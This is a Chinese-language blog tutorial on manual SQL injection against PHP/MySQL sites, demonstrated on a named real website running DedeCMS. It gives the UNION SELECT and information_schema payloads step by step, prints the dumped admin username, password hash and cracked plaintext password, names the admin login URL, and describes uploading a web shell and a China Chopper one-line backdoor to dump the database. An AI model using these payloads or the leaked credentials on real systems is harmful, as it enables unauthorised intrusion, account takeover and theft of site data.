php+mysql手注拿shell教程【朋友給的】

標籤：sql注入 手工注入

註：此文章獻給那些還對注入不怎麼理解的人學習！

目標站：http://www.51team.cn/

注入點：http://www.51team.cn/newmess.php?id=138

找到注入點後猜欄位，可用 order by 1 猜解，order by不可用時，可用union 聯集查詢！

我這裡猜解到的欄位是22， ：

650) this.width=650;" id="aimg_KyAw5" class="zoom" width="600" src="http://www.cnio.org/data/attachment/forum/201406/08/051024mn2nhkhhzqqh78ii.jpg" border="0" />

接下來爆顯示位！文法: and 1=2 union select1,2,4,5,...,22 欄位多少就輸入多少，中間太常，省略了！

然後斷行符號開啟，頁面出現了一個9的數字！

650) this.width=650;" id="aimg_mssyI" class="zoom" width="600" src="http://www.cnio.org/data/attachment/forum/201406/08/051139d4zrder9m9m4panj.jpg" border="0" />

然後我們來查詢下是什麼版本，使用者名稱，資料庫！

version() 版本database()當前資料庫 user() 使用者，要查詢什麼就把剛才爆出9的顯示位替換掉，

650) this.width=650;" id="aimg_cOx0Q" class="zoom" width="600" src="http://www.cnio.org/data/attachment/forum/201406/08/051245nf2qthobazhoolb7.jpg" border="0" />

這是版本號碼，如果要查詢使用者名稱就把瀏覽器上面的9替換成 user（）就行了！

這是我查出來

版本號碼：5.1.32-community

資料庫：51teamcom

使用者名稱：51teamcom 資料庫和使用者名稱一樣！

接下來我們來報表了， 文法 ：FROM information_schema.TABLESwhere table_schema=database() limit 0，1 把瀏覽器裡

的9改成 table_name ，然後斷行符號，你就會看到表了，第一個表是：dede_addonarticle 我們只要爆出的管理員的表就行了！

我們繼續爆，每爆一個就得修改下這個文法 limit 0，1 爆第2個的時候把0改成1，比如：limit 1，1 爆第3個的時候繼續+1 如：limit 2，1 php中0是第一位！

這是我爆出來的表：

dede_addonproduct,dede_admin,dede_admintype,dede_arcatt,dede_arccache,dede_archives,dede_arcrank,dede_arctiny,ddede_arctype,dede_channeltype,dede_co_htmls,dede_co_mediaurls,dede_co_note,dede_co_urls,dede_diyforms,dede_feedback,dede_flink,dede_flinktype,dede_freelist,dede_guestbook,dede_homepageset

織夢的程式！

其中dede_admin 應該就是管理員的表了！我們爆下看！

爆之前，我們先把dede_admin 轉換成16進位的，就是這個 646564655F61646D696E

文法：information_schema.columns WHEREtable_name=0x646564655F61646D696E limit0，1 還是跟上面一樣，爆第幾個就修改數字 0 ，把我們剛才轉換的16進位放到0x後面，0x不要動，然後把顯示位9的數字改成 column_name 然後就行！

我爆的段：id,userid,pwd,uname,tname,email pwd應該就是密碼，uname應該是帳號，我們試試！

and 1=2 union select 1,2,3,4,5,6...,22 from dede_admin 把瀏覽器裡面的文法全部去掉，剩***入點就行，就是這樣；

http://www.51team.cn/about.php?id=10 and 1=2 unionselect 1,2,3,4,5,6...,22 from dede_admin 然後斷行符號！

然後把9替換成剛才我爆出來的欄位 我替換了uname和pwd，開了2個瀏覽器！

使用者是：admin密碼是：d9d2b2de067864194059 密碼加密的，可到cmd5.com解密

650) this.width=650;" id="aimg_vE878" class="zoom" width="600" src="http://www.cnio.org/data/attachment/forum/201406/08/051443xxbs8xccohgb8rx0.jpg" border="0" />

密碼解出來了，這個 bx2013 ，接下來找後台，可以用軟體掃或者Google找！我找出來了：

http://www.51team.cn/web_admin/login.php

成功登陸：

650) this.width=650;" id="aimg_c8DH3" class="zoom" width="600" src="http://www.cnio.org/data/attachment/forum/201406/08/051537yfyaq4djvr84ihwe.jpg" border="0" />

隨便找個上傳點就行，然後上傳馬，先掛個txt吧，嘿嘿！http://www.51team.cn/a.txt

接下來，脫褲咯！

脫褲可以上傳脫褲馬，也可以用菜刀，我就用菜刀的吧，方便！隨便找個php檔案添加一句話！

好，串連了

650) this.width=650;" id="aimg_FuGGN" class="zoom" width="600" src="http://www.cnio.org/data/attachment/forum/201406/08/051633mdldwdf1vtdtn23b.jpg" border="0" />

如果你是用網馬脫的話，就得看網站設定檔conn.php 裡面的資料庫使用者名稱和密碼！

串連後，點網站列表，然後在網址那裡右鍵點擊資料庫管理，然後開啟一個視窗，那個視窗就是資料庫了！

650) this.width=650;" id="aimg_hGd84" class="zoom" width="600" src="http://www.cnio.org/data/attachment/forum/201406/08/051729snrxznjrnrq06cjz.jpg" border="0" />

歡迎加群:QQ群：252799167

本文出自 “尛雷” 部落格，請務必保留此出處http://a3147972.blog.51cto.com/2366547/1548253

php+mysql手注拿shell教程【朋友給的】